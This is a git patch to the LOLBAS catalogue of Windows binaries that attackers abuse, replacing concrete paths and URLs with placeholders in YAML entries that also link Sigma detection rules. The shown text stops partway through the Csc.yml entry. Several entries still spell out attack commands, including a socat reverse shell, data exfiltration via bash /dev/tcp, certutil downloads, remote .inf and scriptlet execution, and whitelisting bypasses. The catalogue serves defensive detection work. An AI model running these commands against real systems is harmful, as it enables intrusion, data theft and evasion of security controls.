From a79893e7ad7fe69e9eeb37c82e90685e10663312 Mon Sep 17 00:00:00 2001 From: Wietze Date: Tue, 28 Jan 2025 11:15:01 +0000 Subject: [PATCH] Generalising file paths and urls, see #10 (#422) --- yml/OSBinaries/AppInstaller.yml | 2 +- yml/OSBinaries/At.yml | 2 +- yml/OSBinaries/Atbroker.yml | 2 +- yml/OSBinaries/Bash.yml | 16 +++++----- yml/OSBinaries/Bitsadmin.yml | 2 +- yml/OSBinaries/Certoc.yml | 4 +-- yml/OSBinaries/Certreq.yml | 12 ++++---- yml/OSBinaries/Certutil.yml | 22 +++++++------- yml/OSBinaries/Cmd.yml | 8 ++--- yml/OSBinaries/Cmdkey.yml | 2 +- yml/OSBinaries/Cmdl32.yml | 2 +- yml/OSBinaries/Cmstp.yml | 6 ++-- yml/OSBinaries/Colorcpl.yml | 4 +-- yml/OSBinaries/ConfigSecurityPolicy.yml | 8 ++--- yml/OSBinaries/Conhost.yml | 8 ++--- yml/OSBinaries/Control.yml | 8 ++--- yml/OSBinaries/Csc.yml | 12 ++++---- yml/OSBinaries/Cscript.yml | 4 +-- yml/OSBinaries/CustomShellHost.yml | 2 +- yml/OSBinaries/DataSvcUtil.yml | 4 +-- yml/OSBinaries/Desktopimgdownldr.yml | 4 +-- yml/OSBinaries/DeviceCredentialDeployment.yml | 4 +-- yml/OSBinaries/Dfsvc.yml | 6 ++-- yml/OSBinaries/Diantz.yml | 12 ++++---- yml/OSBinaries/Diskshadow.yml | 8 ++--- yml/OSBinaries/Dnscmd.yml | 5 ++-- yml/OSBinaries/Esentutl.yml | 16 +++++----- yml/OSBinaries/Eventvwr.yml | 4 +-- yml/OSBinaries/Expand.yml | 8 ++--- yml/OSBinaries/Explorer.yml | 6 ++-- yml/OSBinaries/Extexport.yml | 6 ++-- yml/OSBinaries/Extrac32.yml | 14 ++++----- yml/OSBinaries/Findstr.yml | 12 ++++---- yml/OSBinaries/Forfiles.yml | 10 +++---- yml/OSBinaries/Fsutil.yml | 4 +-- yml/OSBinaries/Ftp.yml | 6 ++-- yml/OSBinaries/Gpscript.yml | 4 +-- yml/OSBinaries/Hh.yml | 16 +++++----- yml/OSBinaries/IMEWDBLD.yml | 4 +-- yml/OSBinaries/Ie4uinit.yml | 4 +-- yml/OSBinaries/Iediagcmd.yml | 2 +- yml/OSBinaries/Ieexec.yml | 12 ++++---- yml/OSBinaries/Ilasm.yml | 7 ++--- yml/OSBinaries/Infdefaultinstall.yml | 4 +-- yml/OSBinaries/Installutil.yml | 6 ++-- yml/OSBinaries/Jsc.yml | 12 ++++---- yml/OSBinaries/Ldifde.yml | 6 ++-- yml/OSBinaries/Makecab.yml | 8 ++--- yml/OSBinaries/Mavinject.yml | 6 ++-- .../Microsoft.Workflow.Compiler.yml | 12 ++++---- yml/OSBinaries/Mmc.yml | 4 +-- yml/OSBinaries/MpCmdRun.yml | 13 ++++---- yml/OSBinaries/Msbuild.yml | 18 +++++------ yml/OSBinaries/Msconfig.yml | 2 +- yml/OSBinaries/Msdt.yml | 10 +++---- yml/OSBinaries/Msedge.yml | 10 +++---- yml/OSBinaries/Mshta.yml | 10 +++---- yml/OSBinaries/Msiexec.yml | 12 ++++---- yml/OSBinaries/Netsh.yml | 4 +-- yml/OSBinaries/Ngen.yml | 2 +- yml/OSBinaries/Odbcconf.yml | 12 ++++---- yml/OSBinaries/Pcalua.yml | 8 ++--- yml/OSBinaries/Pcwrun.yml | 4 +-- yml/OSBinaries/Pktmon.yml | 5 +--- yml/OSBinaries/Pnputil.yml | 2 +- yml/OSBinaries/Presentationhost.yml | 6 ++-- yml/OSBinaries/Print.yml | 12 ++++---- yml/OSBinaries/PrintBrm.yml | 6 ++-- yml/OSBinaries/Provlaunch.yml | 2 +- yml/OSBinaries/Psr.yml | 4 +-- yml/OSBinaries/Rasautou.yml | 4 +-- yml/OSBinaries/Rdrleakdiag.yml | 8 ++--- yml/OSBinaries/Reg.yml | 8 ++--- yml/OSBinaries/Regasm.yml | 8 ++--- yml/OSBinaries/Regedit.yml | 8 ++--- yml/OSBinaries/Regini.yml | 6 ++-- yml/OSBinaries/Register-cimprovider.yml | 6 ++-- yml/OSBinaries/Regsvcs.yml | 10 +++---- yml/OSBinaries/Regsvr32.yml | 10 +++---- yml/OSBinaries/Replace.yml | 12 ++++---- yml/OSBinaries/Rpcping.yml | 4 +-- yml/OSBinaries/Rundll32.yml | 25 +++++----------- yml/OSBinaries/Runexehelper.yml | 2 +- yml/OSBinaries/Runonce.yml | 6 ++-- yml/OSBinaries/Runscripthelper.yml | 8 ++--- yml/OSBinaries/Sc.yml | 6 ++-- yml/OSBinaries/Schtasks.yml | 11 ++----- yml/OSBinaries/Scriptrunner.yml | 12 ++++---- yml/OSBinaries/SettingSyncHost.yml | 6 ++-- yml/OSBinaries/Ssh.yml | 12 ++++---- yml/OSBinaries/Syncappvpublishingserver.yml | 6 ++-- yml/OSBinaries/Tar.yml | 10 +++---- yml/OSBinaries/Ttdinject.yml | 12 ++++---- yml/OSBinaries/Tttracer.yml | 10 +++---- yml/OSBinaries/Unregmp2.yml | 2 +- yml/OSBinaries/Vbc.yml | 6 ++-- yml/OSBinaries/Verclsid.yml | 4 +-- yml/OSBinaries/Wab.yml | 4 +-- yml/OSBinaries/Wbadmin.yml | 4 +-- yml/OSBinaries/Winget.yml | 6 ++-- yml/OSBinaries/Wlrmdr.yml | 6 ++-- yml/OSBinaries/Wmic.yml | 12 ++++---- yml/OSBinaries/WorkFolders.yml | 2 +- yml/OSBinaries/Wscript.yml | 6 ++-- yml/OSBinaries/Wsreset.yml | 4 +-- yml/OSBinaries/Wuauclt.yml | 6 ++-- yml/OSBinaries/Xwizard.yml | 6 ++-- yml/OSBinaries/msedge_proxy.yml | 11 ++----- yml/OSBinaries/msedgewebview2.yml | 16 +++++----- yml/OSBinaries/wt.yml | 4 +-- yml/OSLibraries/Advpack.yml | 10 +++---- yml/OSLibraries/Desk.yml | 4 +-- yml/OSLibraries/Dfshim.yml | 8 ++--- yml/OSLibraries/Ieadvpack.yml | 10 +++---- yml/OSLibraries/Ieframe.yml | 4 +-- yml/OSLibraries/Mshtml.yml | 4 +-- yml/OSLibraries/Pcwutl.yml | 4 +-- yml/OSLibraries/Scrobj.yml | 4 +-- yml/OSLibraries/Setupapi.yml | 4 +-- yml/OSLibraries/Shdocvw.yml | 2 +- yml/OSLibraries/Shell32.yml | 8 ++--- yml/OSLibraries/Shimgvw.yml | 2 +- yml/OSLibraries/Syssetup.yml | 4 +-- yml/OSLibraries/Url.yml | 12 ++++---- yml/OSLibraries/Zipfldr.yml | 2 +- yml/OSLibraries/comsvcs.yml | 3 +- yml/OSScripts/CL_LoadAssembly.yml | 2 -- yml/OSScripts/CL_mutexverifiers.yml | 6 ++-- yml/OSScripts/Cl_invocation.yml | 6 ++-- yml/OSScripts/Launch-VsDevShell.yml | 4 +-- yml/OSScripts/Manage-bde.yml | 6 ++-- yml/OSScripts/Pubprn.yml | 4 +-- yml/OSScripts/Syncappvpublishingserver.yml | 4 +-- yml/OSScripts/UtilityFunctions.yml | 2 -- yml/OSScripts/Winrm.yml | 6 ++-- yml/OSScripts/pester.yml | 14 ++++----- yml/OtherMSBinaries/AccCheckConsole.yml | 6 ++-- yml/OtherMSBinaries/Adplus.yml | 8 ++--- yml/OtherMSBinaries/Agentexecutor.yml | 10 +++---- yml/OtherMSBinaries/Appcert.yml | 4 +-- yml/OtherMSBinaries/Appvlp.yml | 17 +++-------- yml/OtherMSBinaries/Bginfo.yml | 18 +++++------ yml/OtherMSBinaries/Cdb.yml | 10 +++---- yml/OtherMSBinaries/Coregen.yml | 6 ++-- yml/OtherMSBinaries/Createdump.yml | 2 +- yml/OtherMSBinaries/Csi.yml | 6 ++-- yml/OtherMSBinaries/DefaultPack.yml | 6 ++-- yml/OtherMSBinaries/Devinit.yml | 2 +- yml/OtherMSBinaries/Devtoolslauncher.yml | 8 ++--- yml/OtherMSBinaries/Dnx.yml | 10 +++---- yml/OtherMSBinaries/Dotnet.yml | 10 +++---- yml/OtherMSBinaries/Dsdbutil.yml | 2 -- yml/OtherMSBinaries/Dtutil.yml | 2 +- yml/OtherMSBinaries/Dump64.yml | 2 +- yml/OtherMSBinaries/DumpMinitool.yml | 2 +- yml/OtherMSBinaries/Dxcap.yml | 6 ++-- yml/OtherMSBinaries/Excel.yml | 4 +-- yml/OtherMSBinaries/Fsi.yml | 2 +- yml/OtherMSBinaries/FsiAnyCpu.yml | 2 +- yml/OtherMSBinaries/Mftrace.yml | 17 ++--------- .../Microsoft.NodejsTools.PressAnyKey.yml | 4 +-- yml/OtherMSBinaries/Msaccess.yml | 2 +- yml/OtherMSBinaries/Msdeploy.yml | 14 ++++----- yml/OtherMSBinaries/MsoHtmEd.yml | 2 +- yml/OtherMSBinaries/Mspub.yml | 2 +- yml/OtherMSBinaries/Msxsl.yml | 14 ++++----- yml/OtherMSBinaries/Ntdsutil.yml | 4 +-- yml/OtherMSBinaries/OpenConsole.yml | 4 +-- yml/OtherMSBinaries/Powerpnt.yml | 2 +- yml/OtherMSBinaries/Procdump.yml | 8 ++--- yml/OtherMSBinaries/ProtocolHandler.yml | 2 +- yml/OtherMSBinaries/Rcsi.yml | 8 ++--- yml/OtherMSBinaries/Remote.yml | 12 ++++---- yml/OtherMSBinaries/Sqldumper.yml | 4 +-- yml/OtherMSBinaries/Sqlps.yml | 4 +-- yml/OtherMSBinaries/Sqltoolsps.yml | 6 ++-- yml/OtherMSBinaries/Squirrel.yml | 10 +++---- yml/OtherMSBinaries/Te.yml | 4 +-- yml/OtherMSBinaries/Teams.yml | 2 +- yml/OtherMSBinaries/Tracker.yml | 8 ++--- yml/OtherMSBinaries/Update.yml | 30 +++++++++---------- yml/OtherMSBinaries/VSDiagnostics.yml | 4 +-- yml/OtherMSBinaries/VSIISExeLauncher.yml | 7 ++--- yml/OtherMSBinaries/Visio.yml | 2 +- yml/OtherMSBinaries/VisualUiaVerifyNative.yml | 2 -- yml/OtherMSBinaries/VsLaunchBrowser.yml | 6 ++-- yml/OtherMSBinaries/Vshadow.yml | 4 +-- yml/OtherMSBinaries/Vsjitdebugger.yml | 8 ++--- yml/OtherMSBinaries/Wfc.yml | 2 +- yml/OtherMSBinaries/Winproj.yml | 2 +- yml/OtherMSBinaries/Winword.yml | 2 +- yml/OtherMSBinaries/Wsl.yml | 6 ++-- yml/OtherMSBinaries/vsls-agent.yml | 2 +- yml/OtherMSBinaries/vstest.console.yml | 2 +- yml/OtherMSBinaries/winfile.yml | 2 +- yml/OtherMSBinaries/xsd.yml | 2 +- 196 files changed, 555 insertions(+), 758 deletions(-) diff --git a/yml/OSBinaries/AppInstaller.yml b/yml/OSBinaries/AppInstaller.yml index c965bf8..70fed07 100644 --- a/yml/OSBinaries/AppInstaller.yml +++ b/yml/OSBinaries/AppInstaller.yml @@ -4,7 +4,7 @@ Description: Tool used for installation of AppX/MSIX applications on Windows 10 Author: 'Wade Hickey' Created: 2020-12-02 Commands: - - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw + - Command: start ms-appinstaller://?source={REMOTEURL:.exe} Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache. Usecase: Download file from Internet Category: Download diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml index 80c5faa..8794dfc 100644 --- a/yml/OSBinaries/At.yml +++ b/yml/OSBinaries/At.yml @@ -4,7 +4,7 @@ Description: Schedule periodic tasks Author: 'Freddie Barr-Smith' Created: 2019-09-20 Commands: - - Command: C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe + - Command: C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su {CMD} Description: Create a recurring task to execute every day at a specific time. Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive Category: Execute diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index d8f5064..e932250 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -1,7 +1,7 @@ --- Name: Atbroker.exe Description: Helper binary for Assistive Technology (AT) -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: ATBroker.exe /start malware diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index ec33fe0..110442f 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -1,11 +1,11 @@ --- Name: Bash.exe Description: File used by Windows subsystem for Linux -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: bash.exe -c calc.exe - Description: Executes calc.exe from bash.exe + - Command: bash.exe -c "{CMD}" + Description: Executes executable from bash.exe Usecase: Performs execution of specified file, can be used as a defensive evasion. Category: Execute Privileges: User @@ -14,7 +14,7 @@ Commands: Tags: - Execute: CMD - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" - Description: Executes a reverseshell + Description: Executes a reverse shell Usecase: Performs execution of specified file, can be used as a defensive evasion. Category: Execute Privileges: User @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows 10 Tags: - Execute: CMD - - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' + - Command: bash.exe -c 'cat {PATH:.zip} > /dev/tcp/192.168.1.10/24' Description: Exfiltrate data Usecase: Performs execution of specified file, can be used as a defensive evasion. Category: Execute @@ -31,8 +31,8 @@ Commands: OperatingSystem: Windows 10 Tags: - Execute: CMD - - Command: bash.exe -c calc.exe - Description: Executes calc.exe from bash.exe + - Command: bash.exe -c "{CMD}" + Description: Executes executable from bash.exe Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. Category: AWL Bypass Privileges: User @@ -43,8 +43,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\bash.exe - Path: C:\Windows\SysWOW64\bash.exe -Code_Sample: - - Code: Detection: - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml diff --git a/yml/OSBinaries/Bitsadmin.yml b/yml/OSBinaries/Bitsadmin.yml index c41bcf3..68b7f0d 100644 --- a/yml/OSBinaries/Bitsadmin.yml +++ b/yml/OSBinaries/Bitsadmin.yml @@ -1,7 +1,7 @@ --- Name: Bitsadmin.exe Description: Used for managing background intelligent transfer -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1 diff --git a/yml/OSBinaries/Certoc.yml b/yml/OSBinaries/Certoc.yml index 34b5c3f..4d73ac9 100644 --- a/yml/OSBinaries/Certoc.yml +++ b/yml/OSBinaries/Certoc.yml @@ -4,7 +4,7 @@ Description: Used for installing certificates Author: 'Ensar Samil' Created: 2021-10-07 Commands: - - Command: certoc.exe -LoadDLL "C:\test\calc.dll" + - Command: certoc.exe -LoadDLL {PATH_ABSOLUTE:.dll} Description: Loads the target DLL file Usecase: Execute code within DLL file Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows Server 2022 Tags: - Execute: DLL - - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1 + - Command: certoc.exe -GetCACAPS {REMOTEURL:.ps1} Description: Downloads text formatted files Usecase: Download scripts, webshells etc. Category: Download diff --git a/yml/OSBinaries/Certreq.yml b/yml/OSBinaries/Certreq.yml index cd01a66..6f089ee 100644 --- a/yml/OSBinaries/Certreq.yml +++ b/yml/OSBinaries/Certreq.yml @@ -1,18 +1,18 @@ --- Name: CertReq.exe Description: Used for requesting and managing certificates -Author: 'David Middlehurst' +Author: David Middlehurst Created: 2020-07-07 Commands: - - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt - Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory + - Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} {PATH:.txt} + Description: Send the specified file (penultimate argument) to the specified URL via HTTP POST and save the response to the specified txt file (last argument). Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini - Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST and show response in terminal + - Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} + Description: Send the specified file (last argument) to the specified URL via HTTP POST and show response in terminal. Usecase: Upload Category: Upload Privileges: User @@ -21,8 +21,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\certreq.exe - Path: C:\Windows\SysWOW64\certreq.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml - IOC: certreq creates new files diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index 75445ed..3dc75b1 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -1,46 +1,46 @@ --- Name: Certutil.exe Description: Windows binary used for handling certificates -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe - Description: Download and save 7zip to disk in the current folder. + - Command: certutil.exe -urlcache -split -f {REMOTEURL:.exe} {PATH:.exe} + Description: Download and save executable to disk in the current folder. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe - Description: Download and save 7zip to disk in the current folder. + - Command: certutil.exe -verifyctl -f -split {REMOTEURL:.exe} {PATH:.exe} + Description: Download and save executable to disk in the current folder. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt + - Command: certutil.exe -urlcache -split -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt Description: Download and save a PS1 file to an Alternate Data Stream (ADS). Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: certutil -encode inputFileName encodedOutputFileName + - Command: certutil -encode {PATH} {PATH:.base64} Description: Command to encode a file using Base64 Usecase: Encode files to evade defensive measures Category: Encode Privileges: User MitreID: T1027.013 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: certutil -decode encodedInputFileName decodedOutputFileName + - Command: certutil -decode {PATH:.base64} {PATH} Description: Command to decode a Base64 encoded file. Usecase: Decode files to evade defensive measures Category: Decode Privileges: User MitreID: T1140 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName - Description: Command to decode a hexadecimal-encoded file decodedOutputFileName + - Command: certutil -decodehex {PATH:.hex} {PATH} + Description: Command to decode a hexadecimal-encoded file. Usecase: Decode files to evade defensive measures Category: Decode Privileges: User @@ -49,8 +49,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\certutil.exe - Path: C:\Windows\SysWOW64\certutil.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml diff --git a/yml/OSBinaries/Cmd.yml b/yml/OSBinaries/Cmd.yml index 44ec520..8586dc1 100644 --- a/yml/OSBinaries/Cmd.yml +++ b/yml/OSBinaries/Cmd.yml @@ -4,28 +4,28 @@ Description: The command-line interpreter in Windows Author: Ye Yint Min Thu Htut Created: 2019-06-26 Commands: - - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat + - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:{REMOTEURL:.sct} ^scrobj.dll > {PATH}:payload.bat Description: Add content to an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: cmd.exe - < fakefile.doc:payload.bat + - Command: cmd.exe - < {PATH}:payload.bat Description: Execute payload.bat stored in an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS Privileges: User MitreID: T1059.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: type \\webdav-server\folder\file.ext > C:\Path\file.ext + - Command: type {PATH_SMB} > {PATH_ABSOLUTE} Description: Downloads a specified file from a WebDAV server to the target file. Usecase: Download/copy a file from a WebDAV server Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: type C:\Path\file.ext > \\webdav-server\folder\file.ext + - Command: type {PATH_ABSOLUTE} > {PATH_SMB} Description: Uploads a specified file to a WebDAV server. Usecase: Upload a file to a WebDAV server Category: Upload diff --git a/yml/OSBinaries/Cmdkey.yml b/yml/OSBinaries/Cmdkey.yml index d8d84e1..e2b3c42 100644 --- a/yml/OSBinaries/Cmdkey.yml +++ b/yml/OSBinaries/Cmdkey.yml @@ -1,7 +1,7 @@ --- Name: Cmdkey.exe Description: creates, lists, and deletes stored user names and passwords or credentials. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: cmdkey /list diff --git a/yml/OSBinaries/Cmdl32.yml b/yml/OSBinaries/Cmdl32.yml index bf01894..95505a2 100644 --- a/yml/OSBinaries/Cmdl32.yml +++ b/yml/OSBinaries/Cmdl32.yml @@ -1,7 +1,7 @@ --- Name: cmdl32.exe Description: Microsoft Connection Manager Auto-Download -Author: 'Elliot Killick' +Author: Elliot Killick Created: 2021-08-26 Commands: - Command: cmdl32 /vpn /lan %cd%\config diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 5bd76aa..f2876a2 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -1,10 +1,10 @@ --- Name: Cmstp.exe Description: Installs or removes a Connection Manager service profile. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf + - Command: cmstp.exe /ni /s {PATH_ABSOLUTE:.inf} Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet. Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: INF - - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf + - Command: cmstp.exe /ni /s {REMOTEURL:.inf} Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Execute code directly from Internet. Category: AWL Bypass diff --git a/yml/OSBinaries/Colorcpl.yml b/yml/OSBinaries/Colorcpl.yml index e894bba..d5030d0 100644 --- a/yml/OSBinaries/Colorcpl.yml +++ b/yml/OSBinaries/Colorcpl.yml @@ -1,10 +1,10 @@ --- Name: Colorcpl.exe Description: Binary that handles color management -Author: 'Arjan Onwezen' +Author: Arjan Onwezen Created: 2023-06-26 Commands: - - Command: colorcpl file.txt + - Command: colorcpl {PATH} Description: Copies the referenced file to C:\Windows\System32\spool\drivers\color\. Usecase: Copies file(s) to a subfolder of a generally trusted folder (c:\Windows\System32), which can be used to hide files or make them blend into the environment. Category: Copy diff --git a/yml/OSBinaries/ConfigSecurityPolicy.yml b/yml/OSBinaries/ConfigSecurityPolicy.yml index c8aa121..46d8d47 100644 --- a/yml/OSBinaries/ConfigSecurityPolicy.yml +++ b/yml/OSBinaries/ConfigSecurityPolicy.yml @@ -1,17 +1,17 @@ --- Name: ConfigSecurityPolicy.exe -Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads. +Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. You can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads. Author: Ialle Teixeira Created: 2020-09-04 Commands: - - Command: ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile + - Command: ConfigSecurityPolicy.exe {PATH_ABSOLUTE} {REMOTEURL} Description: Upload file, credentials or data exfiltration in general Usecase: Upload file Category: Upload Privileges: User MitreID: T1567 OperatingSystem: Windows 10 - - Command: ConfigSecurityPolicy.exe https://example.com/payload + - Command: ConfigSecurityPolicy.exe {REMOTEURL} Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server Category: Download @@ -23,8 +23,6 @@ Commands: Full_Path: - Path: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml - IOC: ConfigSecurityPolicy storing data into alternate data streams. diff --git a/yml/OSBinaries/Conhost.yml b/yml/OSBinaries/Conhost.yml index cd076da..3ebb4a5 100644 --- a/yml/OSBinaries/Conhost.yml +++ b/yml/OSBinaries/Conhost.yml @@ -4,8 +4,8 @@ Description: Console Window host Author: Wietze Beukema Created: 2022-04-05 Commands: - - Command: "conhost.exe calc.exe" - Description: Execute calc.exe with conhost.exe as parent process + - Command: conhost.exe {CMD} + Description: Execute a command line with conhost.exe as parent process Usecase: Use conhost.exe as a proxy binary to evade defensive counter-measures Category: Execute Privileges: User @@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - - Command: "conhost.exe --headless calc.exe" - Description: Execute calc.exe with conhost.exe as parent process + - Command: conhost.exe --headless {CMD} + Description: Execute a command line with conhost.exe as parent process Usecase: Specify --headless parameter to hide child process window (if applicable) Category: Execute Privileges: User diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index a486458..349196e 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml @@ -1,10 +1,10 @@ --- Name: Control.exe Description: Binary used to launch controlpanel items in Windows -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: control.exe c:\windows\tasks\file.txt:evil.dll + - Command: control.exe {PATH_ABSOLUTE}:evil.dll Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS @@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Command: control.exe c:\windows\tasks\evil.cpl - Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function) + - Command: control.exe {PATH_ABSOLUTE:.cpl} + Description: Execute .cpl file. A CPL is a DLL file with CPlApplet export function) Usecase: Use to execute code and bypass application whitelisting Category: Execute Privileges: User diff --git a/yml/OSBinaries/Csc.yml b/yml/OSBinaries/Csc.yml index c263683..14ad6de 100644 --- a/yml/OSBinaries/Csc.yml +++ b/yml/OSBinaries/Csc.yml @@ -1,18 +1,18 @@ --- Name: Csc.exe Description: Binary file used by .NET Framework to compile C# code -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: csc.exe -out:Output.exe File.cs - Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to Output.exe. + - Command: csc.exe -out:{PATH:.exe} {PATH:.cs} + Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to the specified .exe path. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: csc -target:library File.cs - Description: Use csc.exe 